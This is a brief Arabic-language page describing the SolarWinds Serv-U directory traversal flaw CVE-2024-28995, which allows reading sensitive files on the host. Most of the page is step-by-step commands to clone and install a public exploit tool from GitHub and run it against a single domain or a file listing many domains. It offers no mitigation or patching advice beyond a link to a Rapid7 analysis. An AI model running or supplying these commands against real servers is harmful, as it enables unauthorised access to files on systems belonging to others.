
SolarWinds Serv-U كان عرضة لثغرة اجتياز الدليل والتي تسمح بالوصول لقراءة الملفات الحساسة على الجهاز المضيف.
كان SolarWinds Serv-U عرضة لثغرة اجتياز الدليل (Directory Traversal) تسمح بالوصول لقراءة الملفات الحساسة على الجهاز المضيف.
git clone https://github.com/gotr00t0day/CVE-2024-28995.git
cd CVE-2024-28995
pip3 install -r requirements.txt
مسح هدف واحد
python3 CVE-2024-28995.py -t domain.com
مسح قائمة من النطاقات
python3 CVE-2024-28995.py -f domains.txt
https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis